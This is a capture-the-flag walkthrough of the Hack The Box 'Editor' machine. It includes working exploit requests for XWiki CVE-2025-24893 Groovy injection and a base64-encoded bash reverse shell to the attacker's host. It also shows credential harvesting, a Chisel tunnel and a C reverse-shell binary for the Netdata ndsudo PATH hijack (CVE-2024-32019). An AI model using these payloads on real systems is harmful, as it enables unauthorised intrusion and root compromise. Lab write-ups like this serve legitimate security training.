Editor

https://app.hackthebox.com/machines/Editor

Summary

Editor is a easy-difficulty Linux machine that highlights the risks of exposed administrative documentation platforms and internal service vulnerabilities. Initial access was gained by enumerating subdomains to discover an XWiki instance, which was found to be vulnerable to an unauthenticated Remote Code Execution (RCE) flaw in the SolrSearch macro (CVE-2025-24893).

Post-exploitation enumeration revealed hardcoded database credentials within the XWiki configuration files, enabling lateral movement to the user oliver via password reuse. Root privilege escalation was achieved by identifying an internal Netdata monitoring service. By tunneling the internal port to the attacker machine, a Local Privilege Escalation (LPE) vulnerability (CVE-2024-32019) was exploited in the ndsudo binary, allowing for PATH hijacking and arbitrary command execution as root.

Attack Chain

1. Reconnaissance: Identified wiki.editor.htb subdomain via JavaScript asset enumeration.

2. Initial Access: Exploited CVE-2025-24893 (XWiki SolrSearch RCE) to gain a reverse shell as user xwiki.

3. Lateral Movement: Recovered cleartext credentials from hibernate.cfg.xml and utilized them to SSH as user oliver.

4. Discovery: Identified Netdata service running on internal port 19999.

5. Command and Control: Established a Chisel reverse tunnel to access the Netdata dashboard.

6. Privilege Escalation: Exploited CVE-2024-32019 via the ndsudo SUID binary (PATH Hijacking) to execute a malicious binary as root.

---

Reconnaissance

Remote System Connection

#attack/T1018

Initial connectivity tests were performed using ICMP echo requests to verify the target's availability and estimate the underlying operating system.

┌──(attacker㉿machine)
└─# ping -c 1 10.10.11.80
PING 10.10.11.80 (10.10.11.80) 56(84) bytes of data.
64 bytes from 10.10.11.80: icmp_seq=1 ttl=63 time=40.2 ms
<SNIP>

The Time to Live (TTL) value of 63 suggests the target is a Linux-based machine, accounting for a single hop between the attacker and the target.

Network Scanning

#attack/T1595

To map the attack surface, a full TCP port scan was executed. This identified three open ports associated with standard administrative and web services.

┌──(attacker㉿machine)
└─# sudo nmap 10.10.11.80 -sS --min-rate=5000 -p- -vv -n -Pn -oG nmap-tcp-ports.txt

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

Service Enumeration

#attack/T1046

Following the identification of open ports, a targeted service scan was performed to determine version information and identify potential web applications.

┌──(attacker㉿machine)
└─# nmap 10.10.11.80 -sV -sC -p22,80,8080

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
|_/xwiki/bin/undelete/
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Infrastructure Analysis

The nginx service on port 80 was configured to redirect to a virtual host named editor.htb. To interact with the web application, the local /etc/hosts file was updated to resolve the domain.

┌──(attacker㉿machine)
└─# echo -e "10.10.11.80\\teditor.htb" | sudo tee -a /etc/hosts
10.10.11.80	editor.htb

┌──(attacker㉿machine)
└─# ping -c 1 editor.htb
PING editor.htb (10.10.11.80) 56(84) bytes of data.
64 bytes from editor.htb (10.10.11.80): icmp_seq=1 ttl=63 time=39.7 ms

Cross-referencing the service versions against the Launchpad Ubuntu database provided more granular insights into the host operating system:

• SSH (OpenSSH 8.9p1-3ubuntu0.13): Associated with Ubuntu Jammy (22.04 LTS).

• HTTP 80 (nginx 1.18.0-6ubuntu8.2): Associated with Ubuntu Hirsute (21.04).

The discrepancy between package codenames (Jammy vs. Hirsute) suggests the possibility of containerization or services running within different environments (e.g., Docker or LXC) on the same host.

---

Web Exploitation

Tech Profiling

#attack/T1592_002 #attack/T1083

Initial fingerprinting of the web service on Port 80 was conducted using whatweb to identify the underlying technology stack and server configurations.

┌──(attacker㉿machine)
└─# whatweb -v http://editor.htb
WhatWeb report for http://editor.htb
Status    : 200 OK
Title     : Editor - SimplistCode Pro
IP        : 10.10.11.80
Summary   : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], Script[module]

HTTP Headers:
	HTTP/1.1 200 OK
	Server: nginx/1.18.0 (Ubuntu)
	Content-Type: text/html
	Last-Modified: Sun, 15 Jun 2025 06:18:30 GMT
	Connection: close
	ETag: W/"684e65b6-277"
	Content-Encoding: gzip

The server is running nginx 1.18.0. A search for known exploits for this specific version yielded no immediate results.

┌──(attacker㉿machine)
└─# searchsploit nginx 1.18.0
Exploits: No Results
Shellcodes: No Results

Manual inspection of the home page revealed a landing page for an IDE named SimplistCode Pro. The site provides download links for both Linux (.deb) and Windows (.exe) installers. Additionally, an administrative email address, contact@editor.htb, was identified.

Subdomain Discovery

Automated crawling with gospider was employed to identify additional endpoints and potential subdomains within the application’s JavaScript assets.

┌──(attacker㉿machine)
└─# gospider --subs -s http://editor.htb
[url] - [code-200] - http://editor.htb
[href] - http://editor.htb/assets/index-DzxC4GL5.css
[javascript] - http://editor.htb/assets/index-VRKEJlit.js
[subdomains] - http://wiki.editor.htb
[linkfinder] - [from: http://editor.htb/assets/index-VRKEJlit.js] - /assets/simplistcode_1.0.deb
[linkfinder] - [from: http://editor.htb/assets/index-VRKEJlit.js] - config.json
<SNIP>

The crawl successfully identified a new virtual host: wiki.editor.htb. This subdomain was added to the local /etc/hosts file for further investigation.

┌──(attacker㉿machine)
└─# sudo sed -i '$s/$/ wiki.editor.htb/' /etc/hosts
┌──(attacker㉿machine)
└─# ping -c 1 wiki.editor.htb
64 bytes from editor.htb (10.10.11.80): icmp_seq=1 ttl=63 time=39.0 ms

XWiki Enumeration

#attack/T1589_002 #attack/T1592

The wiki.editor.htb subdomain appears to serve as a documentation hub for the SimplistCode Pro project, powered by the XWiki platform.

┌──(attacker㉿machine)
└─# whatweb -v http://wiki.editor.htb
WhatWeb report for http://wiki.editor.htb
Status    : 302 Found
RedirectLocation: http://wiki.editor.htb/xwiki/bin/view/Main/

WhatWeb report for http://wiki.editor.htb/xwiki/bin/view/Main/
Status    : 200 OK
Title     : XWiki - Main - Intro
Summary   : Cookies[JSESSIONID], HTML5, nginx[1.18.0], XWiki
HTTP Headers:
	Set-Cookie: JSESSIONID=node01qz7xdmriljgod74xie1lisxo50599.node0; Path=/xwiki
	Content-Language: en

Accessing the wiki revealed the application is running XWiki 15.10.8. While searchsploit does not list direct exploits for this specific version, the wiki contains valuable documentation regarding the SimplistCode Pro application.

Information Leakage

The "Main - Intro" page was authored by Neal Bagwell. This identifies a potential username, neal, for future brute-force or authentication attacks.

---

RCE via XWiki SolrSearchMacros (CVE-2025-24893)

#attack/T1210 #owasp/A03_2025 #owasp/A05_2025 #mitre/CWE-95

Further investigation of Port 8080 confirmed it acts as a secondary entry point or proxy for the XWiki service identified earlier. While automated vulnerability scanners like nuclei failed to flag specific issues, manual research into XWiki version 15.10.8 revealed a critical unauthenticated Remote Code Execution (RCE) vulnerability tracked as CVE-2025-24893.

The vulnerability exists in the SolrSearch macro, where improper sanitization allows a guest user to inject an async execution block containing arbitrary Groovy code.

Vulnerability Validation

A Proof-of-Concept (PoC) was executed to confirm the execution context. By sending a crafted GET request to the SolrSearch endpoint, the server was forced to calculate a mathematical expression within a Groovy script block.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20' | html2text
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>RSS feed for search on [}}}Hello from search text:42 ]</title>
<SNIP>

The response title containing Hello from search text:42 confirms that the Groovy engine executed the injected code, verifying the RCE vulnerability.

Arbitrary File Read & Local Enumeration

#attack/T1083 #attack/T1592_002

Leveraging the RCE, the payload was modified to execute system commands using the Groovy .execute().text method. This allowed for the exfiltration of sensitive system files, beginning with /etc/passwd. Further technical details regarding this specific exploitation vector can be found in the OffSec vulnerability analysis.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d' | html2text

<SNIP>
<description>RSS feed for search on [}}}root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<SNIP>
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false]</description>
<SNIP>

Analysis of the /etc/passwd file identified two primary users with interactive shell access, which will be the focus for gaining a persistent foothold:

┌──(attacker㉿machine)
└─# grep sh$ passwd.txt 
root:x:0:0:root:/root:/bin/bash
oliver:x:1000:1000:,:/home/oliver:/bin/bash

The target is confirmed to be vulnerable to unauthenticated RCE as the xwiki user. The existence of a local user oliver provides a clear path for lateral movement or privilege escalation.

---

Initial Access

Remote Code Execution & Reverse Shell

#attack/T1210 #attack/T1059_004 #owasp/A05_2025

With command execution confirmed via the XWiki SolrSearch vulnerability, the next objective was to establish an interactive foothold. A Bash reverse shell payload was selected for its reliability on Linux-based targets.

To ensure the payload was not corrupted by special character interpretation within the URL or the Groovy engine, the command was Base64 encoded.

┌──(attacker㉿machine)
└─# echo 'bash -i >& /dev/tcp/10.10.14.199/4444 0>&1' | base64
YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo=

The encoded string was then wrapped in a Groovy execution command designed to decode and execute the shell via /bin/bash. The entire string was URL-encoded to maintain compatibility with the HTTP GET request.

Final Encoded Groovy Payload: println("bash -c {echo,YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo=}|{base64,-d}|{bash,-i}".execute().text)

A listener was initialized on the attack machine using netcat prior to dispatching the exploit.

┌──(attacker㉿machine)
└─# sudo nc -nlvp 4444
Listening on 0.0.0.0 4444

The crafted request was sent using curl, targeting the vulnerable SolrSearch endpoint.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash+-c+%7Becho%2CYmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22.execute%28%29.text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d'

Foothold Established

The listener successfully intercepted the incoming connection, providing an interactive shell as the service user xwiki.

Connection received on 10.10.11.80 44402
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ id; hostname -I
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
10.10.11.80 172.17.0.1 

TTY Stabilization

The initial shell lacked job control and proper terminal formatting. A standard stabilization procedure was performed to enable full interactivity, including Tab-completion and support for text editors.

xwiki@editor:/usr/lib/xwiki-jetty$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
xwiki@editor:/usr/lib/xwiki-jetty$ ^Z
[1]+  Stopped                 sudo nc -nlvp 4444

┌──(attacker㉿machine)
└─# stty raw -echo; fg
[back on target]
xwiki@editor:/usr/lib/xwiki-jetty$ reset xterm
xwiki@editor:/usr/lib/xwiki-jetty$ stty rows 65 columns 115
xwiki@editor:/usr/lib/xwiki-jetty$ export SHELL=bash TERM=xterm-256color HOME=/etc/skel

The environment was successfully normalized, allowing for efficient post-exploitation and enumeration.

---

Discovery

System Enumeration

#attack/T1082 #attack/T1083

Following the successful establishment of a foothold as the xwiki service user, internal enumeration was conducted to map the local environment. Initial checks confirmed the operating system is Ubuntu 22.04.5 LTS (Jammy), consistent with prior reconnaissance.

xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.5 LTS"
<SNIP>

A manual audit of the home directories revealed that the user oliver is present on the system, though the directory remains inaccessible to the current user.

Credential Harvesting

#attack/T1552_001 #owasp/A03_2025

To identify potential vectors for privilege escalation, the XWiki configuration files were audited for hardcoded credentials. Research indicated that database connection strings are typically stored within the hibernate.cfg.xml file.

xwiki@editor:/usr/lib/xwiki-jetty$ find /etc/xwiki -type f -name "hibernate.cfg.xml" 2>/dev/null
/etc/xwiki/hibernate.cfg.xml

xwiki@editor:/usr/lib/xwiki-jetty$ grep -Ei "user|pass" /etc/xwiki/hibernate.cfg.xml
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>

A cleartext password for the xwiki database user was identified: theEd1t0rTeam99.

Lateral Movement

#attack/T1078 #attack/T1021_004

Given the frequency of password reuse in such environments, the discovered credential was tested against the user oliver via SSH.

┌──(attacker㉿machine)
└─# ssh oliver@editor.htb
oliver@editor.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

Lateral Movement Successful

The password theEd1t0rTeam99 was successfully reused for the oliver account, granting higher-level access to the system.

oliver@editor:~$ cat user.txt 
498ed5b7789631df38136e944dc6aea5

Internal Service Enumeration

#attack/T1046

With access to the oliver account, a review of internal listening ports was conducted to identify services restricted to the localhost interface.

oliver@editor:~$ ss -tunlp
Netid  State   Recv-Q  Send-Q         Local Address:Port      Peer Address:Port
tcp    LISTEN  0       151                127.0.0.1:3306           0.0.0.0:*    
tcp    LISTEN  0       4096               127.0.0.1:19999          0.0.0.0:*    
tcp    LISTEN  0       511                  0.0.0.0:80             0.0.0.0:*    
<SNIP>

The output revealed an unusual service running on TCP Port 19999. Probing the service with curl identified it as a Netdata Embedded HTTP Server (v1.45.2).

oliver@editor:~$ curl -s -I http://127.0.0.1:19999
HTTP/1.1 200 OK
Connection: keep-alive
Server: Netdata Embedded HTTP Server v1.45.2
<SNIP>

Exfiltration of Internal Web Assets

To facilitate offline analysis of the Netdata dashboard, the HTML source was exfiltrated to the attack machine using netcat.

Attacker Machine:

┌──(attacker㉿machine)
└─# nc -nlvp 8000 > netdata.html

Target Machine:

oliver@editor:~$ curl -s http://127.0.0.1:19999 > netdata.html
oliver@editor:~$ nc 10.10.14.199 8000 < netdata.html
oliver@editor:~$ md5sum netdata.html 
226467a12f3cfdb97e69dea63a7e1fd5  netdata.html

The integrity of the exfiltrated file was verified on the attacker machine using the MD5 hash 226467a12f3cfdb97e69dea63a7e1fd5. This service will be further analyzed for potential privilege escalation vectors to root.

---

Port Forwarding & Internal Service Access

#attack/T1572 #attack/T1090

To facilitate a comprehensive analysis of the Netdata service running on the loopback interface (127.0.0.1:19999), a reverse tunnel was established using Chisel.

Tool Preparation & Optimization

The target architecture was confirmed as x86_64, and the corresponding Chisel binary was prepared on the attack machine. To minimize the forensic footprint and speed up the transfer, the binary was compressed using the upx utility.

┌──(attacker㉿machine)
└─# /opt/tools/upx --brute ./chisel
        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   9371800 ->   2824036   30.13%   linux/amd64   chisel                        

Packed 1 file.

The optimized binary was then transferred to the target's /dev/shm directory via a Python-based HTTP server.

oliver@editor# wget http://10.10.14.199:8000/chisel -O /dev/shm/chisel
oliver@editor# chmod +x /dev/shm/chisel

Tunnel Establishment

A Chisel server was initialized on the attack machine, and the client was executed on the target to map the internal port 19999 to the attacker's local interface.

Attacker (Server):

┌──(attacker㉿machine)
└─# ./chisel server -port 1234 --reverse

Target (Client):

oliver@editor# ./chisel client 10.10.14.199:1234 R:19999:127.0.0.1:19999

The tunnel successfully exposed the internal service. Verification with lsof confirmed that the attack machine was now listening on port 19999.

---

Privilege Escalation

Local Privilege Escalation (CVE-2024-32019)

#attack/T1548_001 #attack/T1574_007 #mitre/CWE-426

With the Netdata dashboard accessible, a version audit identified the software as Netdata Agent v1.45.2.

Research into this version revealed a critical Local Privilege Escalation (LPE) vulnerability, CVE-2024-32019. The vulnerability resides in the ndsudo tool, a SUID binary intended to execute a restricted set of commands with root privileges. However, ndsudo fails to sanitize the PATH environment variable, allowing an attacker to intercept execution by placing a malicious binary in a user-writable directory.

SUID Binary Validation

The presence and permissions of the vulnerable binary were verified on the target system.

oliver@editor# find / -name "*ndsudo*" 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

oliver@editor# ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

The binary is owned by root and has the SUID bit set (-rws). Since the user oliver is a member of the netdata group, they have the necessary permissions to execute this binary and trigger the PATH hijacking vulnerability.

oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

Further analysis of the ndsudo binary confirmed its utility in executing administrative commands on behalf of the Netdata agent. By invoking the --help flag, the supported command set was identified, revealing that ndsudo searches for specific executables (such as nvme) within the system's PATH.

oliver@editor# /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
<SNIP>
The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json
<SNIP>
The program searches for executables in the system path.

The vulnerability stems from the binary's reliance on an untrusted PATH environment variable. Since ndsudo is an SUID executable owned by root, hijacking the nvme command via PATH manipulation allows for arbitrary code execution with elevated privileges.

Public Exploit Compilation

#attack/T1587_004

A malicious C-based payload was prepared to establish a reverse shell. The exploit was cross-compiled statically on the attack machine to ensure portability and named nvme to match the executable expected by ndsudo.

┌──(attacker㉿machine)
└─# cat exploit.c
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);
    system("bash -c 'bash -i >& /dev/tcp/10.10.14.199/9001 0>&1'");
    return 0;
}

┌──(attacker㉿machine)
└─# gcc -o nvme exploit.c -static

Execution & Path Hijacking

#attack/T1574_007

The compiled binary was transferred to the target's /dev/shm directory. To trigger the exploit, the PATH variable was prepended with the current working directory, forcing ndsudo to execute the malicious nvme binary instead of the legitimate system utility.

oliver@editor:/dev/shm# wget http://10.10.14.199:8000/nvme
oliver@editor:/dev/shm# chmod +x nvme
oliver@editor:/dev/shm# PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Root Access Granted The PATH hijacking successfully redirected the privileged execution flow to the malicious binary, resulting in a root shell on the listener.

┌──(attacker㉿machine)
└─# sudo nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.11.80 35244
root@editor:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)

root@editor:/dev/shm# cat /root/root.txt
989035e41800216fe35f82661c88b6df

Persistence & Credential Recovery

#attack/T1552_004 #attack/T1021_004 #attack_T1098_004

To maintain administrative access without re-exploiting the ndsudo vulnerability, the root user's private SSH key was exfiltrated.

root@editor:/dev/shm# cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
<SNIP>
TRIxZw2ANCpldxfWrt1SEOVWrBBsgFlTkkNlEMNcX4CzhovkKupC5Tu9fUgkUy6iQkx5zm
FLvpDdK+RXvFcAAAALcm9vdEBlZGl0b3I=
-----END OPENSSH PRIVATE KEY-----

The key was saved locally and used to establish a persistent, high-integrity SSH session.

┌──(attacker㉿machine)
└─# chmod 600 id_rsa
┌──(attacker㉿machine)
└─# ssh root@editor.htb -i id_rsa
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
root@editor:~#

As a final discovery step, the /etc/shadow file was sampled to verify the ability to harvest system-wide password hashes for offline cracking. #attack/T1003_008

root@editor:~# head -n 1 /etc/shadow
root:$y$j9T$l1.MaTIpHzTAduIC4EoaA/$rNvK9Vq.iBxZ3BXRP4SM2CtSkVYdVnr5XrWQvMzLx99:20258:0:99999:7:::